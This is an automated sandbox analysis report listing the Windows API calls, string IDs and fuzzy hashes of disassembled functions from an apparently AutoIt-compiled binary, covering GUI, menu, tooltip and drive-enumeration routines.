                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                        • API String ID: 2910397461-517079104
                                                                                                                        • Opcode ID: b648aadde344e1f462f0aa576cd818ca28b0def85b422bb95f7b600973217df0
                                                                                                                        • Instruction ID: 60860a77397af24210509ef4d7a9ea353f19ae2bcd9544868bdb2c00df6b53ff
                                                                                                                        • Opcode Fuzzy Hash: b648aadde344e1f462f0aa576cd818ca28b0def85b422bb95f7b600973217df0
                                                                                                                        • Instruction Fuzzy Hash: EAA14C71A40215BFEB14DFAADC4AFAE7BB9EB04711F008154F614BB2E0D6B0AD04CB60
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00DDE45E
                                                                                                                        • GetDriveTypeW.KERNEL32(?,00E2DC88,?,\\.\,00E2DBF0), ref: 00DDE54B
                                                                                                                        • SetErrorMode.KERNEL32(00000000,00E2DC88,?,\\.\,00E2DBF0), ref: 00DDE6B1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$DriveType
                                                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                        • API String ID: 2907320926-4222207086
                                                                                                                        • Opcode ID: d2ecd7873401b3349c440711bfc5358b546a9d84934efeeac7f2dab025a324d0
                                                                                                                        • Instruction ID: a5978dd5aa2fde188ca6367ebb7fbe73461f12b498dd4a8593cce39216463d95
                                                                                                                        • Opcode Fuzzy Hash: d2ecd7873401b3349c440711bfc5358b546a9d84934efeeac7f2dab025a324d0
                                                                                                                        • Instruction Fuzzy Hash: 0D517030248301ABC710FF24E8D1929B7A1EBA4744B659E1BF486BF3D1DA60DE45DB72
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsnicmp
                                                                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                        • API String ID: 1038674560-86951937
                                                                                                                        • Opcode ID: 501af739a5c5c3996455e4db175e0028ec861b02f9f3af557bebe03ed3468749
                                                                                                                        • Instruction ID: c7fb9105e9bdc87f48ac43d4189d09bc22c084a18ac5de865ca563c31759f167
                                                                                                                        • Opcode Fuzzy Hash: 501af739a5c5c3996455e4db175e0028ec861b02f9f3af557bebe03ed3468749
                                                                                                                        • Instruction Fuzzy Hash: FB61F671744312BBDF21AA74AC82FBA3398EF15740F142025F956BA5C6EBA0DA41C6B1
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32 ref: 00D94956
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00D94998
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00D949A3
                                                                                                                        • DestroyCursor.USER32(00000000), ref: 00D949AE
                                                                                                                        • DestroyWindow.USER32(00000000), ref: 00D949B9
                                                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00E0E179
                                                                                                                        • 6FAA0200.COMCTL32(?,000000FF,?), ref: 00E0E1B2
                                                                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00E0E5E0
                                                                                                                          • Part of subcall function 00D949CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D94954,00000000), ref: 00D94A23
                                                                                                                        • SendMessageW.USER32 ref: 00E0E627
                                                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E0E63E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DestroyMessageSendWindow$DeleteObject$A0200CursorInvalidateMoveRect
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 377055139-4108050209
                                                                                                                        • Opcode ID: f2a91b811eac25838ac673508098c08871d4bf1a2874395346372a4e113b9e0d
                                                                                                                        • Instruction ID: 5c6049a1083373ddcccef2ba65cde809f0628b4938f25ae73f46aea1c4dd01b0
                                                                                                                        • Opcode Fuzzy Hash: f2a91b811eac25838ac673508098c08871d4bf1a2874395346372a4e113b9e0d
                                                                                                                        • Instruction Fuzzy Hash: 24127030504201EFDB25CF14C984BA6BBE5FF45308F545979E999EB2A2C731E886CFA1
                                                                                                                        APIs
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00DFC598
                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00DFC64E
                                                                                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 00DFC669
                                                                                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00DFC925
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 2326795674-4108050209
                                                                                                                        • Opcode ID: 4c76174a880f39994d939d34aaf904e34d6758846a82c10b5ed2b284dfe312b4
                                                                                                                        • Instruction ID: 9bf53d2e49be153c0fc9c23eb3ecd3279dc7efa4b57aab52c4bea0821b1c7d6d
                                                                                                                        • Opcode Fuzzy Hash: 4c76174a880f39994d939d34aaf904e34d6758846a82c10b5ed2b284dfe312b4
                                                                                                                        • Instruction Fuzzy Hash: 84F1127111834CAFE7208F24CD84BBABBE4FF45354F099A18F698E62A0C770D864CB61
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?,00E2DBF0), ref: 00DF6245
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper
                                                                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                        • API String ID: 3964851224-45149045
                                                                                                                        • Opcode ID: aa9ce3a2bc642f35d1848257d556c03640876f66aa92351c95493cf465bc0d03
                                                                                                                        • Instruction ID: 91d4f49997ba8cf52863546f829a5294b968d2668707acb03e6e8381cbca30fa
                                                                                                                        • Opcode Fuzzy Hash: aa9ce3a2bc642f35d1848257d556c03640876f66aa92351c95493cf465bc0d03
                                                                                                                        • Instruction Fuzzy Hash: D0C192702042059BCB04EF64C451B7E77D6EF95394F09886DF9866B796CB20DD0ACBB2
                                                                                                                        APIs
                                                                                                                        • GetSysColor.USER32(00000012), ref: 00DFD3BE
                                                                                                                        • SetTextColor.GDI32(?,?), ref: 00DFD3C2
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00DFD3D8
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00DFD3E3
                                                                                                                        • CreateSolidBrush.GDI32(?), ref: 00DFD3E8
                                                                                                                        • GetSysColor.USER32(00000011), ref: 00DFD400
                                                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DFD40E
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00DFD41F
                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00DFD428
                                                                                                                        • SelectObject.GDI32(?,?), ref: 00DFD435
                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00DFD454
                                                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DFD46B
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00DFD480
                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DFD4A8
                                                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00DFD4CF
                                                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00DFD4ED
                                                                                                                        • DrawFocusRect.USER32(?,?), ref: 00DFD4F8
                                                                                                                        • GetSysColor.USER32(00000011), ref: 00DFD506
                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00DFD50E
                                                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00DFD522
                                                                                                                        • SelectObject.GDI32(?,00DFD0B5), ref: 00DFD539
                                                                                                                        • DeleteObject.GDI32(?), ref: 00DFD544
                                                                                                                        • SelectObject.GDI32(?,?), ref: 00DFD54A
                                                                                                                        • DeleteObject.GDI32(?), ref: 00DFD54F
                                                                                                                        • SetTextColor.GDI32(?,?), ref: 00DFD555
                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00DFD55F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1996641542-0
                                                                                                                        • Opcode ID: c9f3bf7efe4d1e199f197cbc7692e0422bd392a4606961239ac853cda04d776d
                                                                                                                        • Instruction ID: a04b68edd95fa47246cfc8e96ee92037f4b4cad85c26219373bb7bb004bef041
                                                                                                                        • Opcode Fuzzy Hash: c9f3bf7efe4d1e199f197cbc7692e0422bd392a4606961239ac853cda04d776d
                                                                                                                        • Instruction Fuzzy Hash: 36516B71905218FFDB109FA9DC48EEE7BBAEB08320F158115FA11BB2A0D77599408B60
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00DFB5C0
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DFB5D1
                                                                                                                        • CharNextW.USER32(0000014E), ref: 00DFB600
                                                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00DFB641
                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00DFB657
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DFB668
                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00DFB685
                                                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00DFB6D7
                                                                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00DFB6ED
                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DFB71E
                                                                                                                        • _memset.LIBCMT ref: 00DFB743
                                                                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00DFB78C
                                                                                                                        • _memset.LIBCMT ref: 00DFB7EB
                                                                                                                        • SendMessageW.USER32 ref: 00DFB815
                                                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00DFB86D
                                                                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00DFB91A
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00DFB93C
                                                                                                                        • GetMenuItemInfoW.USER32(?), ref: 00DFB986
                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00DFB9B3
                                                                                                                        • DrawMenuBar.USER32(?), ref: 00DFB9C2
                                                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00DFB9EA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 1073566785-4108050209
                                                                                                                        • Opcode ID: 396e0f32ff50d12ad91cc256fe137e182ad53f56b222a7dbc623f47fc0e361bc
                                                                                                                        • Instruction ID: dd7038acd5ebead70edbc50bf86b8ce7d7babf1966a93dbfd97e127a30a7e396
                                                                                                                        • Opcode Fuzzy Hash: 396e0f32ff50d12ad91cc256fe137e182ad53f56b222a7dbc623f47fc0e361bc
                                                                                                                        • Instruction Fuzzy Hash: 1EE16A7590021CAEDF209F51CC84AFE7BB8EF05760F19C156FA69AA290DB748A44CF70
                                                                                                                        APIs
                                                                                                                        • GetCursorPos.USER32(?), ref: 00DF7587
                                                                                                                        • GetDesktopWindow.USER32 ref: 00DF759C
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00DF75A3
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00DF7605
                                                                                                                        • DestroyWindow.USER32(?), ref: 00DF7631
                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00DF765A
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DF7678
                                                                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00DF769E
                                                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00DF76B3
                                                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00DF76C6
                                                                                                                        • IsWindowVisible.USER32(?), ref: 00DF76E6
                                                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00DF7701
                                                                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00DF7715
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00DF772D
                                                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00DF7753
                                                                                                                        • GetMonitorInfoW.USER32 ref: 00DF776D
                                                                                                                        • CopyRect.USER32(?,?), ref: 00DF7784
                                                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00DF77EF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                        • String ID: ($0$tooltips_class32
                                                                                                                        • API String ID: 698492251-4156429822
                                                                                                                        • Opcode ID: 6dd398350e3421a3e4d1853cc5a975ec5987d77be1c8756840bab07b0f747db7
                                                                                                                        • Instruction ID: 33f7e2d98452817b36b4fd60858015a038749a0a25501ca7edeb5695609d7773
                                                                                                                        • Opcode Fuzzy Hash: 6dd398350e3421a3e4d1853cc5a975ec5987d77be1c8756840bab07b0f747db7
                                                                                                                        • Instruction Fuzzy Hash: 47B19071608340AFDB04DF69C944BAABBE5FF88310F04891DF699AB291D770EC05CBA1
                                                                                                                        APIs
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DAA839
                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00DAA841
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DAA86C
                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00DAA874
                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00DAA899
                                                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00DAA8B6
                                                                                                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00DAA8C6
                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00DAA8F9
                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00DAA90D
                                                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00DAA92B
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00DAA947
                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00DAA952
                                                                                                                          • Part of subcall function 00DAB736: GetCursorPos.USER32(000000FF), ref: 00DAB749
                                                                                                                          • Part of subcall function 00DAB736: ScreenToClient.USER32(00000000,000000FF), ref: 00DAB766
                                                                                                                          • Part of subcall function 00DAB736: GetAsyncKeyState.USER32(00000001), ref: 00DAB78B
                                                                                                                          • Part of subcall function 00DAB736: GetAsyncKeyState.USER32(00000002), ref: 00DAB799
                                                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00DAACEE), ref: 00DAA979
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                        • String ID: AutoIt v3 GUI
                                                                                                                        • API String ID: 1458621304-248962490
                                                                                                                        • Opcode ID: 4f38599f36b4605b051cc3b4692216dff768e8fdfaa65c7a761db7526448e504
                                                                                                                        • Instruction ID: 84a81b680bd35b1b20a86a2a055c1fd048d54f247202adf0b735f83d2039b290
                                                                                                                        • Opcode Fuzzy Hash: 4f38599f36b4605b051cc3b4692216dff768e8fdfaa65c7a761db7526448e504
                                                                                                                        • Instruction Fuzzy Hash: 68B16831A0020AEFDB18DFA9CC45BEE7BB5FB08315F158629FA15A7290DB74D841CB61
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00DF6A52
                                                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00DF6B12
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                        • API String ID: 3974292440-719923060
